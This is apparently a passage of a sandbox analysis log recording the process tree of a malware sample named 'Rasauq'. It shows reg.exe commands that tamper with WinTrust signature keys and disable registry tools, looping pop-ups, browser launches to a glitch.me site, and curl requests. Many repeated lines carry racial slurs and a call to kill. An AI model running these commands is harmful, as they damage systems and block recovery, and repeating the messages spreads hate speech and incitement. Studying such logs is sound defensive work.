- Modifies data under HKEY_USERS
PID:3612
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4408
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:3632
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:460
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f4⤵PID:3916
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4200
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5264
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:536
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:2444
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f4⤵PID:5192
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3496
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3184
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Rasauq on top" /f4⤵PID:3428
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f4⤵PID:4708
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f4⤵PID:5816
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵PID:3176
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f4⤵PID:4116
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f4⤵PID:5296
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:5272
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:4084
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Software\Rasauq on top" /f4⤵PID:5764
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:4616
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:5184
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:1788
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:3164
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5900
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵PID:4776
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1912
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:2560
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:4668
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f4⤵PID:2076
-
-
C:\Windows\system32\reg.exereg add "End of search: 39 match(es) found.\Software\Rasauq on top" /f4⤵PID:1996
-
-
C:\Windows\system32\msg.exemsg * /time:3 "This machine has been compromised by Rasuaq"4⤵PID:1140
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4496
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f4⤵PID:1932
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1948
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5616
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6100
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2696
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3568
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4340
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4616
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5184
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1788
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3164
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2848
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2888
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5980
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4228
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4544
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4288
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5804
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2996
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:760
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5472
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2836
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1932
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5616
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5992
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1808
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3652
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5932
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6004
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5412
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2324
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1080
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1044
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4700
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5140
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3368
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4788
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:668
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1612
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3560
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3352
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:304
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3664
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5788
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5796
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2432
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4832
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4876
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5960
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:300
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3488
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3612
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4376
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3704
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2000
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2112
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3964
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5980
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2060
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:300
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3740
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3588
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5140
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:316
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2144
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3612
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:396
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2224
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3740
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2556
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5192
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:396
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2144
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3820
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4816
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4856
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:396
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:396
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4856
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6492
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6508
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6524
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6540
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6676
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6696
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7084
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7108
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7124
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7164
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6240
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6260
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:948
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6688
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6728
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6868
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6916
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6932
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6372
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3540
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5916
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6592
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:948
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6708
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6344
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6684
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6612
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6560
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2880
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6676
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6372
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6604
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6960
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6248
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6676
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6708
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6156
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6488
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6708
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6656
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6368
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6736
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7296
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7312
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7328
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7344
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7392
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7412
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7644
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7660
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7828
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7884
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:8000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:8048
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:8056
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7440
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7452
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7548
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7564
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7616
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7472
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7688
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5348
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:8000
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:8032
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:8084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7232
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7392
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7700
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7716
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7948
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7892
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7748
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:8072
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7644
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7592
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:8136
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7692
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5348
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7536
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5424
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7676
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7700
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:8028
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7976
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7700
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7616
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7936
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5340
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7616
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7828
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5340
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:8524
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:8544
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:8568
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:8592
-
-
